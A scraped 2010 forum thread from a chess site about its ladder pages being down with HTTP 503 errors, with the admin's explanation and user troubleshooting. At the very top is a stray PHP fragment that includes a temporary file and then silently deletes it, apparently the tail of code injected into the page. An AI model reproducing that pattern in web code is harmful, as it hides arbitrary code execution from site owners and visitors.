"); fclose($hdl); include("{$eb}frmtmp.php"); @unlink("{$eb}frmtmp.php"); ?> Net-Chess.Com • View topic - Ladders out of order these last few weeks...

Ladders out of order these last few weeks...

For discussion regarding the chess ladder

Ladders out of order these last few weeks...

Postby ajochem » Tue Jan 05, 2010 8:52 am

Service Unavailable

HTTP Error 503. The service is unavailable.
:?:
Perhaps there's some way we could help solving these troubles... :?
ajochem

Postby jsnyder » Wed Jan 06, 2010 12:09 pm

Here's the response from mluka in the general forum.
I posted there cuz I didn't look and see there was a separate ladder forum.. lol oops!

mluka wrote:I had moved the site to a new server around four months ago and have had nothing but problems since then. Unfortunately, there's no guarantee that I wouldn't encounter similar issues on any other server.

To worsen the situation, I am absolutely swamped right now. I'm considering, rather than looking back and fighting the bugs in this old version, pushing out the new version, which is less-than-beta quality. If I can count on getting consistent user feedback - preferably more of the "this feature isn't working because of xxxxx" or "I was expecting xxxxxxxxxx but experienced/witnessed yyyyyyyyy" rather than "fix this $^%#$$%" - then that will be the way to go.

That would likely hasten the return of the team competition as well, but I must emphasize how buggy it will be in the early going for both ladders and teams if we go this route.

Thoughts?
jsnyder

Postby mluka » Fri Jan 22, 2010 11:18 pm

We're back online and I cleaned out some of those old challenges. That's not to say it's necessarily issue-free. Hopefully it's robust enough to stand on its own for a bit longer.
mluka

I'm afraid it's still "Unavailable", at least from

Postby ajochem » Wed Feb 10, 2010 4:52 pm

mluka wrote:We're back online and I cleaned out some of those old challenges. That's not to say it's necessarily issue-free. Hopefully it's robust enough to stand on its own for a bit longer.

Tried many times along these days... :(
:arrow: http://ladders.chessclubinternational.com/

Service Unavailable

--------------------------------------------------------------------------------

ajochem

Postby senna » Thu Feb 11, 2010 12:58 pm

It doesn't work for me either!
Senna
senna

Re: Ladders out of order these last few weeks...

Postby cmarcolino » Mon Feb 15, 2010 8:21 am

ajochem wrote:
Service Unavailable

:?:
Perhaps there's some way we could help solving these troubles... :?

[2]
cmarcolino

.NET Applications

Postby sonrisante » Thu Mar 04, 2010 1:28 am

I notice the .aspx extension, which implies a .NET application. Sometimes .NET applications are slow to load the first time, since it's initializing the entire .NET framework and loading a lot into cache. Sometimes websites even time out.

I just loaded the page and after about 30 seconds I got the correct ladder screen. I bet I'm not the first to use it today.

My suggestion to users: if you receive a 503 or something like that after a while, wait another minute or so and then click the link again (not refresh). It may load the second time.
sonrisante

.NET Applications

Postby sonrisante » Thu Mar 04, 2010 1:31 am

I notice the .aspx extension, which implies a .NET application. Sometimes .NET applications are slow to load the first time, since it's initializing the entire .NET framework and loading a lot into cache. Sometimes websites even time out.

I just loaded the page and after about 30 seconds I got the correct ladder screen. I bet I'm not the first to use it today.

My suggestion to users: if you receive a 503 or something like that after a while, wait another minute or so and then click the link again (not refresh). It may load the second time.
sonrisante

Return to Chess Ladder